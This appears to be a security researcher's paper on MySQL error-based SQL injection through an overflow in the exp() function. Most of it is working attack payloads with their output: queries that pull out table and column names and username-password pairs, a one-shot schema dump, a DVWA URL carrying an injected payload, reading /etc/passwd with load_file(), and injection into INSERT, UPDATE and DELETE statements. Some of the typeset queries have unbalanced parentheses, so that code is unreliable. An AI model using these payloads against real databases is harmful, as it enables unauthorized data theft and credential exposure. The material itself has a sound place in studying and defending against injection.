MySQL Error Based SQL Injection Using EXP

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Overview

This is another overflow in the DOUBLE data type in MySQL I found. You can refer to my previous paper on BIGINT Overflow Error based injections if you want to understand exploiting overflows in extracting data. Also the queries are similar to my previous paper. When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

```
mysql> select exp(709);
+-----------------------+
| exp(709)             |
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
```

The exp is the opposite of the ln and log functions of MySQL. If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to: \( e \approx 2.71828183 \).

\[
\ln(15) = \log_e(15) = 2.70805020110221
\]

```
mysql> select log(15);
+------------------+
| log(15)          |
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

mysql> select ln(15);
+------------------+
| ln(15)           |
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
```
Exponentials are the opposite of logarithms. The exp function would do the exact opposite for us.

\[ e^{2.70805020110221} = 15 \]

**Injection**

When it comes to injection we can cause these “DOUBLE value is out of range” errors by negating queries. Suppose I do a bitwise negation a query it will return “18446744073709551615”. If you may recall from my previous post, this is the bitwise negation of 0. This is due to the reason that a function returns 0 on a successful execution and when we negate it, it will be the maximum unsigned BIGINT value.

When we pass sub queries with the bitwise negation this would cause a DOUBLE overflow error and we can extract data :)  

```sql
exp(~(select * from (select user())x))
```

```
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~(select 'root@localhost' from dual))')
```
Extracting Data

Getting table names:

\[
\texttt{select exp(~(select *from select table_name from information_schema.tables where table_schema=database() limit 0,1)x)};
\]

Getting column names:

\[
\texttt{select exp(~(select *from select column_name from information_schema.columns where table_name='users' limit 0,1)x)};
\]

Retrieving Data:

\[
\texttt{select exp(~(select *from(select concat_ws(':id',username,password) from users limit 0,1)x)};
\]

Dump In One Shot

This is the query for dumping all tables and columns from the current context. We can dump along with all databases but since we are extracting via an error it would return very few results.

\[
\texttt{exp(~(select *from(select concat(@:=0,(select count(*)from `information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))}
\]

http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from `information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))--&Submit=Submit#
Reading Files

You can read files by applying the load_file() function but I noticed that there is a limit of 13 lines.

```
select exp(~(select * from(select load_file('/etc/passwd'))a));
```

Note that you can’t write to files since this an error it will write just 0.

```
mysql> select exp(~(select 'hello')a)) into outfile 'C:/out.txt';
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'
```

# type C:\out.txt
0
Injection in Insert

All these are normal injections like the rest.

```sql
mysql> insert into users (id, username, password) values (2, "^ exp(~(select " from(select user())x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual))')
```

For all insert, update and delete statements the DIOS query can be applied as well.

```sql
mysql> insert into users (id, username, password) values (2, "| exp(~(select * from(select concat(@:=0,(select count(*) from information_schema.columns where table_schema=database()) and @:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@))x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000 newdb::users::id newdb::users::username newdb::users::password' from dual))')
```

Injection in Update

```sql
mysql> update users set password='Peter' ^ exp(~(select * from(select user())x)) where id=4;
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual))')
```

Injection in Delete

```sql
mysql> delete from users where id='1' | exp(~(select * from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual))')
```
Conclusion
As previous BGIN T injections this exp injection too works in MySQL version 5.5.5 and above. In previous versions a silent wraparound occurs.

```sql
mysql> select version();
+---------------------+
| version()           |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
+----------+
| exp(710) |
+----------+
| 1.#INF   |
+----------+
1 row in set (0.00 sec)

mysql> select exp(~0);
+----------+
| exp(~0)  |
+----------+
| 1.#INF   |
+----------+
1 row in set (0.00 sec)
```

There might be other functions like this which might be prone to errors :)

References